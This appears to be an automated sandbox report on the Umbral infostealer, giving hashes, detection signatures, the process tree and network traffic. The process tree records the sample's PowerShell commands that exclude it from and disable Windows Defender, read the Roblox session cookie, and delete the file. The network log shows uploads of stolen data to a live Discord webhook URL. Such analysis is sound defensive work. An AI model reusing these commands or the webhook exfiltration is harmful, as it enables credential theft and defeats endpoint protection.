Overview

overview

10

Static

static

10

Новая...2).zip

windows10-2004-x64

1

Новая...2).zip

windows10-ltsc_2021-x64

1

Новая...2).zip

windows11-21h2-x64

1

Umbral.exe

windows10-2004-x64

10

Umbral.exe

windows10-ltsc_2021-x64

10

Umbral.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    436s
  • max time network
    438s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/03/2025, 19:56 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Umbral.exe

  • Size

    229KB

  • MD5

    fdb6c9cdf5605efda3e45942dad869d4

  • SHA1

    8022afe157b98ad5fd5ead6f17ce35caff40b168

  • SHA256

    bea3c8ebdb0c815aff349ef6ad6f0d92751ae62e4ced9ac2c68582d4e9d1c0af

  • SHA512

    434a552c3dbdf7024f4a557ce9f01f755037aa303da03ed7752c9d1acd6c5fa050deef34983c7f491237a5c7adb3317db279b6e8e0bd3dab8bc0547dc031455e

  • SSDEEP

    6144:lloZM+rIkd8g+EtXHkv/iD4ggxVFzQEbsCzFQMpf7b8e1mAUi:noZ1L+EP8ggxVFzQEbsCzFQMpXz

Score
10/10
umbraldiscoveryexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    defense_evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4004
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Views/modifies file attributes
      PID:1896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:6060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1144
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1824
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3540
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:3400
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1204
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:3424
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        2⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:3840
        • C:\Windows\system32\PING.EXE
          ping localhost
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3836

    Network

    • flag-us
      DNS
      gstatic.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      gstatic.com
      IN A
      Response
      gstatic.com
      IN A
      142.250.187.227
    • flag-gb
      GET
      https://gstatic.com/generate_204
      Umbral.exe
      Remote address:
      142.250.187.227:443
      Request
      GET /generate_204 HTTP/1.1
      Host: gstatic.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 204 No Content
      Content-Length: 0
      Cross-Origin-Resource-Policy: cross-origin
      Date: Tue, 25 Mar 2025 19:57:10 GMT
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-us
      DNS
      ip-api.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/json/?fields=225545
      Umbral.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/?fields=225545 HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Tue, 25 Mar 2025 19:57:13 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 191
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.ax-0001.ax-msedge.net
      g-bing-com.ax-0001.ax-msedge.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=2EC3AC9E892B69770BB8B9248890688C; domain=.bing.com; expires=Sun, 19-Apr-2026 19:57:14 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: F6F7930FF6A24D34B09844B54ECDADA8 Ref B: LON04EDGE0906 Ref C: 2025-03-25T19:57:14Z
      date: Tue, 25 Mar 2025 19:57:13 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2EC3AC9E892B69770BB8B9248890688C
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=CeTrAqeKGmmxlatypEf0wdKzRGnXK8GvHTdqTB2PeEw; domain=.bing.com; expires=Sun, 19-Apr-2026 19:57:14 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: C83C6D4A400446F5ACE94EFB7E7BD42A Ref B: LON04EDGE0906 Ref C: 2025-03-25T19:57:14Z
      date: Tue, 25 Mar 2025 19:57:13 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2EC3AC9E892B69770BB8B9248890688C; MSPTC=CeTrAqeKGmmxlatypEf0wdKzRGnXK8GvHTdqTB2PeEw
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: F23F641F3F0B45ABB9222FE8711F2FAD Ref B: LON04EDGE0906 Ref C: 2025-03-25T19:57:14Z
      date: Tue, 25 Mar 2025 19:57:13 GMT
    • flag-us
      DNS
      discord.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      discord.com
      IN A
      Response
      discord.com
      IN A
      162.159.128.233
      discord.com
      IN A
      162.159.138.232
      discord.com
      IN A
      162.159.135.232
      discord.com
      IN A
      162.159.136.232
      discord.com
      IN A
      162.159.137.232
    • flag-us
      POST
      https://discord.com/api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw
      Umbral.exe
      Remote address:
      162.159.128.233:443
      Request
      POST /api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw HTTP/1.1
      Accept: application/json
      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
      Content-Type: application/json; charset=utf-8
      Host: discord.com
      Content-Length: 969
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 204 No Content
      Date: Tue, 25 Mar 2025 19:57:15 GMT
      Content-Type: text/html; charset=utf-8
      Connection: keep-alive
      Set-Cookie: __dcfduid=594d31ec09b311f0bdda9a151f89b0bf; Expires=Sun, 24-Mar-2030 19:57:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
      x-ratelimit-limit: 5
      x-ratelimit-remaining: 4
      x-ratelimit-reset: 1742932636
      x-ratelimit-reset-after: 1
      via: 1.1 google
      alt-svc: h3=":443"; ma=86400
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1DAtN9l%2BUx97lzExSownMLquLp4bmtTUX98gRUDjXCzIWOL%2FI5sLpTbjqif0jfO%2BezkELILlH5YDIUfCR3976VvVSe9l1pEtmT%2FpL1pTO%2FmF%2B78rRxPRIaTS5MQK"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      X-Content-Type-Options: nosniff
      Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
      Set-Cookie: __sdcfduid=594d31ec09b311f0bdda9a151f89b0bfc3a7ad99608f2fcfdcdf3170228a60d59b3f4b3eaadb220d519b7c82e22aacdf; Expires=Sun, 24-Mar-2030 19:57:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
      Set-Cookie: __cfruid=7d1571c01534b02cdf8f5299a4d20b1925023cb3-1742932635; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
      Set-Cookie: _cfuvid=Z2E2I5pD29tJWB8tMP6tR6U3zLdmFwrAOIzLqF4dHE4-1742932635096-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 9260f9e6dee67698-LHR
    • flag-us
      POST
      https://discord.com/api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw
      Umbral.exe
      Remote address:
      162.159.128.233:443
      Request
      POST /api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw HTTP/1.1
      Accept: application/json
      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
      Content-Type: multipart/form-data; boundary="07b6b1a5-a0cd-41cb-89a8-349c39eaf3fc"
      Host: discord.com
      Cookie: __dcfduid=594d31ec09b311f0bdda9a151f89b0bf; __sdcfduid=594d31ec09b311f0bdda9a151f89b0bfc3a7ad99608f2fcfdcdf3170228a60d59b3f4b3eaadb220d519b7c82e22aacdf; __cfruid=7d1571c01534b02cdf8f5299a4d20b1925023cb3-1742932635; _cfuvid=Z2E2I5pD29tJWB8tMP6tR6U3zLdmFwrAOIzLqF4dHE4-1742932635096-0.0.1.1-604800000
      Content-Length: 427403
      Expect: 100-continue
      Response
      HTTP/1.1 200 OK
      Date: Tue, 25 Mar 2025 19:57:15 GMT
      Content-Type: application/json
      Transfer-Encoding: chunked
      Connection: keep-alive
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
      x-ratelimit-limit: 5
      x-ratelimit-remaining: 4
      x-ratelimit-reset: 1742932636
      x-ratelimit-reset-after: 1
      vary: Accept-Encoding
      via: 1.1 google
      alt-svc: h3=":443"; ma=86400
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gQAYyUmTPOCq27nBITOVCEUiXtrfzcxwooHoHbfB7l3%2BVlKdKRRuLyCDPNxRibWFMqT231uZoVYOOcHMkvQP%2BrxmXdhS4PRbYdgpYXB1Ky5tpscNU0oU2AeH8qBR"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      X-Content-Type-Options: nosniff
      Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
      Server: cloudflare
      CF-RAY: 9260f9ea08fc7698-LHR
    • flag-us
      DNS
      tse1.mm.bing.net
      Remote address:
      8.8.8.8:53
      Request
      tse1.mm.bing.net
      IN A
      Response
      tse1.mm.bing.net
      IN CNAME
      mm-mm.bing.net.trafficmanager.net
      mm-mm.bing.net.trafficmanager.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 843567
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 0E409839069D430AAF4F77EF3E6653F9 Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:46Z
      date: Tue, 25 Mar 2025 19:57:46 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239360433542_1UJC4903W7XNIUU73&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239360433542_1UJC4903W7XNIUU73&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 688476
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 995BCF98CE5D4B16B75064F7F953ABEF Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:46Z
      date: Tue, 25 Mar 2025 19:57:46 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239339388161_17PDPNJBHCJYF0MEC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239339388161_17PDPNJBHCJYF0MEC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 586035
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: E99611C5731842BAA0360402F6805071 Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:46Z
      date: Tue, 25 Mar 2025 19:57:46 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239360433543_1F4HJPO10Z3VYH0SK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239360433543_1F4HJPO10Z3VYH0SK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 871109
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 56BB06C694F2440090C98EAE4FD35488 Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:46Z
      date: Tue, 25 Mar 2025 19:57:46 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 550329
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 0604C250DE064F60A496C03ED14B1329 Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:46Z
      date: Tue, 25 Mar 2025 19:57:46 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239339388162_1MFS3CT3ZOVTF7TJA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239339388162_1MFS3CT3ZOVTF7TJA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 731444
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 23B7B9F9D598411E94DA65FFE8EB200D Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:47Z
      date: Tue, 25 Mar 2025 19:57:47 GMT
    • flag-us
      DNS
      c.pki.goog
      Remote address:
      8.8.8.8:53
      Request
      c.pki.goog
      IN A
      Response
      c.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.179.227
    • flag-gb
      GET
      http://c.pki.goog/r/r1.crl
      Remote address:
      142.250.179.227:80
      Request
      GET /r/r1.crl HTTP/1.1
      Cache-Control: max-age = 3000
      Connection: Keep-Alive
      Accept: */*
      If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: c.pki.goog
      Response
      HTTP/1.1 304 Not Modified
      Date: Tue, 25 Mar 2025 19:48:15 GMT
      Expires: Tue, 25 Mar 2025 20:38:15 GMT
      Age: 599
      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
      Cache-Control: public, max-age=3000
      Vary: Accept-Encoding
    • 142.250.187.227:443
      https://gstatic.com/generate_204
      tls, http
      Umbral.exe
      724 B
       4.9kB
       8
      8

      HTTP Request

      GET https://gstatic.com/generate_204

      HTTP Response

      204
    • 208.95.112.1:80
      http://ip-api.com/json/?fields=225545
      http
      Umbral.exe
      309 B
       540 B
       5
      4

      HTTP Request

      GET http://ip-api.com/json/?fields=225545

      HTTP Response

      200
    • 150.171.27.10:443
